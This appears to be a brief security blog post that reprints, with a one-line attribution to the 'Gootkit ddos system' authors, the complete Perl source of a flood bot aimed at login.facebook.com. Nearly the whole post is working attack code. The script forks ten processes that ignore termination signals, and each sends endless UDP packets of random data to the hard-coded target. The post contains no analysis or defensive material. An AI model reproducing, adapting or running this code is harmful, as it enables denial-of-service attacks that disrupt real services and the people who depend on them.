Together with the flood bots that I noticed and wrote about in a previews post, there was a flood bot specifically created to target facebook logins. From the coding style and some similarities it looks like it’s written from the same people that created ‘Gootkit ddos system’.
The code,
#!/usr/bin/perl
use Fcntl qw(:flock :DEFAULT);
use Socket;
use IO::Socket;
use IO::Select;
print "Content-type: text/plain\n\n";
print "Decepticons ahead!";
# Set target parameters
my $targetHost = "login.facebook.com";
my $targetPort = "80";
my $targetPacketSize = "1024";
my $threads = 10;
############################################
my $os = $^O;
my $child = undef;
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
#$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
my $pid=fork;
if ($pid) {
# print "kill parent $$\n";
exit;
}
main ();
sub main {
my $arg = $_[0];
if ($arg eq "iamchild"){
udpflooder($targetHost, $targetPort, $targetPacketSize);
exit;
}
else {
for (my $i=0; $i<$threads; $i++)
{
$thread = fork;
if ($thread == 0){ #child
main("iamchild");
}
else { #parent
next;
}
}
}
}
#udpflooder($targetHost, $targetPort, $targetPacketSize);
sub genGarbage {
my $len = $_[0];
my $chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+|\=-~`1234567890";
my $garbage = '';
for my $i (0..$len){
my $symbol = substr $chars, int rand length($chars), 1;
$garbage .= $symbol;
}
return $garbage;
}
sub udpflooder {
$child = fork;
if ($child == 0){
my $iaddr = inet_aton($_[0]);
my $host = $_[0];
my $porta = $_[1];
my $packetSize = $_[2];
my $msg = genGarbage($packetSize);
my $socketUdp;
socket($socketUdp, PF_INET, SOCK_DGRAM, getprotobyname('udp')) or return(undef);
while (1)
{
send($socketUdp, $msg, 0, sockaddr_in($porta, $iaddr));
}
}
else {
exit;
}
}
No comments:
Post a Comment